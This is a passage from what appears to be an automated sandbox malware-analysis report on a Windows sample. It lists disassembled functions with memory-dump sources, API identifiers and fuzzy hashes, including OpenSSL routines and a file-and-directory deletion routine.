                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E02F272B0C69382E72C8B15E464E7D67A5FF84784F9841B5DA6E866D8EF3DE441C300
                                                                                                                                                                                                                            Function 00007FFE0CFD1960 Relevance: 13.6, APIs: 9, Instructions: 72COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1878127469.00007FFE0CFD1000.00000020.00000001.01000000.0000002B.sdmp, Offset: 00007FFE0CFD0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878106458.00007FFE0CFD0000.00000002.00000001.01000000.0000002B.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878147059.00007FFE0CFD3000.00000002.00000001.01000000.0000002B.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878163707.00007FFE0CFD4000.00000004.00000001.01000000.0000002B.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878181390.00007FFE0CFD5000.00000002.00000001.01000000.0000002B.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffe0cfd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 313767242-0
                                                                                                                                                                                                                            • Opcode ID: f8ae4d2eff8d27b3a0b7405f1d7147d7316b9bc7e7709510c05685c771672a79
                                                                                                                                                                                                                            • Instruction ID: c6fe342a0d17af38c2a5ea220db897a2c8539874236277750d2740f908257b2a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f8ae4d2eff8d27b3a0b7405f1d7147d7316b9bc7e7709510c05685c771672a79
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DD315072648B8189EB609F64E8503ED73B5FB84758F44803ADB8D57BA8DF38D648C711
                                                                                                                                                                                                                            Function 00007FFE0E141960 Relevance: 13.6, APIs: 9, Instructions: 72COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1878605073.00007FFE0E141000.00000020.00000001.01000000.00000028.sdmp, Offset: 00007FFE0E140000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878486915.00007FFE0E140000.00000002.00000001.01000000.00000028.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878635209.00007FFE0E144000.00000002.00000001.01000000.00000028.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878654068.00007FFE0E145000.00000004.00000001.01000000.00000028.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878672109.00007FFE0E146000.00000002.00000001.01000000.00000028.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffe0e140000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 313767242-0
                                                                                                                                                                                                                            • Opcode ID: 0a57d354b9f48531f5e4b6dcb676abd35c4c55538187d76e763eeca891f7d0db
                                                                                                                                                                                                                            • Instruction ID: 1471d4f0fd55e74c19809b9e3828e17e4c414aad5f17abec35b9d8c0f5b03c54
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0a57d354b9f48531f5e4b6dcb676abd35c4c55538187d76e763eeca891f7d0db
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CE314FB2709B819AEB609F60E8507ED73A4FB84744F44443ADA8E47BA8DF3CD658C710
                                                                                                                                                                                                                            Function 00007FFE0E131960 Relevance: 13.6, APIs: 9, Instructions: 72COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1878335285.00007FFE0E131000.00000020.00000001.01000000.00000029.sdmp, Offset: 00007FFE0E130000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878291246.00007FFE0E130000.00000002.00000001.01000000.00000029.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878375563.00007FFE0E136000.00000002.00000001.01000000.00000029.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878423261.00007FFE0E13B000.00000002.00000001.01000000.00000029.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffe0e130000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 313767242-0
                                                                                                                                                                                                                            • Opcode ID: 26897df24f70a55c30b919b36952ff972a20fdcb0ee0bee13c52e1828fe953fd
                                                                                                                                                                                                                            • Instruction ID: e9b9fb562b947729729fc94a42333905ca36910be1d4bff195ca9bb4a2dff0c2
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 26897df24f70a55c30b919b36952ff972a20fdcb0ee0bee13c52e1828fe953fd
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 15311776609A82DAEB609F70E8903ED7365FB84744F44443ADA8E47AA8DF38D648C710
                                                                                                                                                                                                                            Function 00007FFE0CFE1960 Relevance: 13.6, APIs: 9, Instructions: 72COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1878218664.00007FFE0CFE1000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FFE0CFE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878198987.00007FFE0CFE0000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878236359.00007FFE0CFE3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878254447.00007FFE0CFE4000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878272126.00007FFE0CFE5000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffe0cfe0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 313767242-0
                                                                                                                                                                                                                            • Opcode ID: f8ae4d2eff8d27b3a0b7405f1d7147d7316b9bc7e7709510c05685c771672a79
                                                                                                                                                                                                                            • Instruction ID: 6facbb5a2fdcc22f60c5a3f0e5ad0c26150b1ef882ce922f8ef730cf56e98bcd
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f8ae4d2eff8d27b3a0b7405f1d7147d7316b9bc7e7709510c05685c771672a79
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E8316C72648B818AEB608F69E8403FD73A0FB84748F44443ADB4E57BA9DF38D648C710
                                                                                                                                                                                                                            Function 00007FFE0CFB1A80 Relevance: 13.6, APIs: 9, Instructions: 72COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1878001785.00007FFE0CFB1000.00000020.00000001.01000000.0000002C.sdmp, Offset: 00007FFE0CFB0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877953890.00007FFE0CFB0000.00000002.00000001.01000000.0000002C.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878046330.00007FFE0CFB5000.00000002.00000001.01000000.0000002C.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878066834.00007FFE0CFBF000.00000004.00000001.01000000.0000002C.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878086023.00007FFE0CFC0000.00000002.00000001.01000000.0000002C.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffe0cfb0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 313767242-0
                                                                                                                                                                                                                            • Opcode ID: 4daa35a496de95c00f3549ff2ee86a4c9bdd8fe61db81f85dce5350646ac50d2
                                                                                                                                                                                                                            • Instruction ID: f7f78c9f922eb0f45568d149f233857279dddf62fac70897c81159b43232addb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4daa35a496de95c00f3549ff2ee86a4c9bdd8fe61db81f85dce5350646ac50d2
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 05313E72649B8286EB649F64E8503ED73A4FF84744F44443ADB4E47AA8EF3CD648C711
                                                                                                                                                                                                                            Function 00007FFE0E151960 Relevance: 13.6, APIs: 9, Instructions: 72COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1878707402.00007FFE0E151000.00000020.00000001.01000000.00000027.sdmp, Offset: 00007FFE0E150000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878689714.00007FFE0E150000.00000002.00000001.01000000.00000027.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878725552.00007FFE0E153000.00000002.00000001.01000000.00000027.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878743319.00007FFE0E155000.00000002.00000001.01000000.00000027.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffe0e150000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 313767242-0
                                                                                                                                                                                                                            • Opcode ID: f8ae4d2eff8d27b3a0b7405f1d7147d7316b9bc7e7709510c05685c771672a79
                                                                                                                                                                                                                            • Instruction ID: 011cf9c2e4d4d6303fd38ee243f7c64073c0074f9ff4f8eca22b817b2b18e2d3
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f8ae4d2eff8d27b3a0b7405f1d7147d7316b9bc7e7709510c05685c771672a79
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0C312A73709B81DAEB619F60E8503EE7364FB84744F44443ADA8E47AA8DF38D648C710
                                                                                                                                                                                                                            Function 00007FFE0E161960 Relevance: 13.6, APIs: 9, Instructions: 72COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1878783464.00007FFE0E161000.00000020.00000001.01000000.00000026.sdmp, Offset: 00007FFE0E160000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878762255.00007FFE0E160000.00000002.00000001.01000000.00000026.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878804469.00007FFE0E163000.00000002.00000001.01000000.00000026.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878824157.00007FFE0E165000.00000002.00000001.01000000.00000026.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffe0e160000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 313767242-0
                                                                                                                                                                                                                            • Opcode ID: f8ae4d2eff8d27b3a0b7405f1d7147d7316b9bc7e7709510c05685c771672a79
                                                                                                                                                                                                                            • Instruction ID: 2b18b6d858ed009bc47826d4556957a228c517559d8baf6423f531cf4099d480
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f8ae4d2eff8d27b3a0b7405f1d7147d7316b9bc7e7709510c05685c771672a79
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A314D72709B829AEB609F60E8503ED7365FB84744F44443ADA8E47BAADF3CD648C710
                                                                                                                                                                                                                            Function 00007FFDFABD3028 Relevance: 13.6, APIs: 9, Instructions: 71COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875105491.00007FFDFABD0000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFABD5000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC32000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC7E000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC82000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC87000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFACDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875292663.00007FFDFACE2000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875308130.00007FFDFACE4000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 313767242-0
                                                                                                                                                                                                                            • Opcode ID: 077b0f214cb87451efc13930c849abf149ec882450af492fe5d50a1ac414abff
                                                                                                                                                                                                                            • Instruction ID: b937ec8db7d367903c73458873e72f2a411d1ab675bccfc4abc62139528fdfdb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 077b0f214cb87451efc13930c849abf149ec882450af492fe5d50a1ac414abff
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 84313B72709B818AEB648F60E8A0BED7364FB84744F84417ADA5E47B99DF3CD548C710
                                                                                                                                                                                                                            Function 00007FFDFF241B90 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 90COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_freeO_mallocR_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$SSL_client_hello_get1_extensions_present
                                                                                                                                                                                                                            • API String ID: 3444577743-3548336300
                                                                                                                                                                                                                            • Opcode ID: d17b2675fe725dc111e3a916023c63f1d74d54b08614264e5e1a06e890eb5ac0
                                                                                                                                                                                                                            • Instruction ID: a8959207e1a22d427d84089a12856a5d626e04875e8b57a3cd3be39f472bdecb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d17b2675fe725dc111e3a916023c63f1d74d54b08614264e5e1a06e890eb5ac0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B5419B32B0AB8192EB44DB15D464AA867A1FB44B88F984231DE7DCB7D9DF3DE9418300
                                                                                                                                                                                                                            Function 00007FF602997900 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,00007FF602997E49,00007FF6029939E6), ref: 00007FF60299796B
                                                                                                                                                                                                                            • RemoveDirectoryW.KERNEL32(?,00007FF602997E49,00007FF6029939E6), ref: 00007FF6029979EE
                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,00007FF602997E49,00007FF6029939E6), ref: 00007FF602997A0D
                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(?,00007FF602997E49,00007FF6029939E6), ref: 00007FF602997A1B
                                                                                                                                                                                                                            • FindClose.KERNEL32(?,00007FF602997E49,00007FF6029939E6), ref: 00007FF602997A2C
                                                                                                                                                                                                                            • RemoveDirectoryW.KERNEL32(?,00007FF602997E49,00007FF6029939E6), ref: 00007FF602997A35
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                            • String ID: %s\*
                                                                                                                                                                                                                            • API String ID: 1057558799-766152087
                                                                                                                                                                                                                            • Opcode ID: e73b3b26c07a692c2e321a0bc7db53cd169b5d642d038f09448de321a2f09d93
                                                                                                                                                                                                                            • Instruction ID: 87de05e3530dbb09626c8cccc1ae563330c24ee2b14ed6161d1b187f3680d0fd
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e73b3b26c07a692c2e321a0bc7db53cd169b5d642d038f09448de321a2f09d93
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A7412661A1CA4289EE309F6AE4441F9A760FF9876CFA00632D99DC36C6DFBCD655C700
                                                                                                                                                                                                                            Function 00007FFDFF241F28 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_freeO_strdupR_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$SSL_use_psk_identity_hint
                                                                                                                                                                                                                            • API String ID: 598019968-3050056966
                                                                                                                                                                                                                            • Opcode ID: 6a7186c22779984460632f0d8cd213799fa53bb9072794df5bc172ebfb32efea
                                                                                                                                                                                                                            • Instruction ID: 4b7e1ad41d76400375f8d1f1308c9ffbcc37613e2123ce76e5344d5f0863ad1b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6a7186c22779984460632f0d8cd213799fa53bb9072794df5bc172ebfb32efea
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F21E261F1968299FB88D715E4A0BB85791FF45780F888231DABDC77DADF2CD8904700
                                                                                                                                                                                                                            Function 00007FFDFF245EE0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_clear_flagsO_freeO_get_dataO_get_initO_get_shutdownO_set_init
                                                                                                                                                                                                                            • String ID: ..\s\ssl\bio_ssl.c
                                                                                                                                                                                                                            • API String ID: 3531300166-4039210333
                                                                                                                                                                                                                            • Opcode ID: daad7cc8e3f834ff3c8acb7dc8f696082f746c65e6a5a1afb62d0272194b350f
                                                                                                                                                                                                                            • Instruction ID: 7107e298be9d09358694d49eae866998b8d3faca3c44390d5b41de5fd5577056
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: daad7cc8e3f834ff3c8acb7dc8f696082f746c65e6a5a1afb62d0272194b350f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4E018061F1964341FB48A6229532EB853815F87BD0F881230EE7EC66CBEF5CE6504701
                                                                                                                                                                                                                            Function 00007FFDFABD12F0 Relevance: 10.8, APIs: 7, Instructions: 343COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875105491.00007FFDFABD0000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFABD5000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC32000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC7E000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC82000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC87000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFACDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875292663.00007FFDFACE2000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875308130.00007FFDFACE4000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Mem_$MallocSubtypeType_$DeallocErr_FreeMemory
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4139299733-0
                                                                                                                                                                                                                            • Opcode ID: 1a81e9c38499873679165206c29f2f174bec07526da98c475f808ef3ba3417ca
                                                                                                                                                                                                                            • Instruction ID: a351859cade7f6c20046b32a5138eaaee3c222c2d917b0c7527d1a472ce4b3ef
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1a81e9c38499873679165206c29f2f174bec07526da98c475f808ef3ba3417ca
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 63E1A9B6F0C65381EB2C8B15E464E7D6BA5EF50758F9401B2DA6F826C9DF3CE8818700
                                                                                                                                                                                                                            Function 00007FFDFF241F8C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 90COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
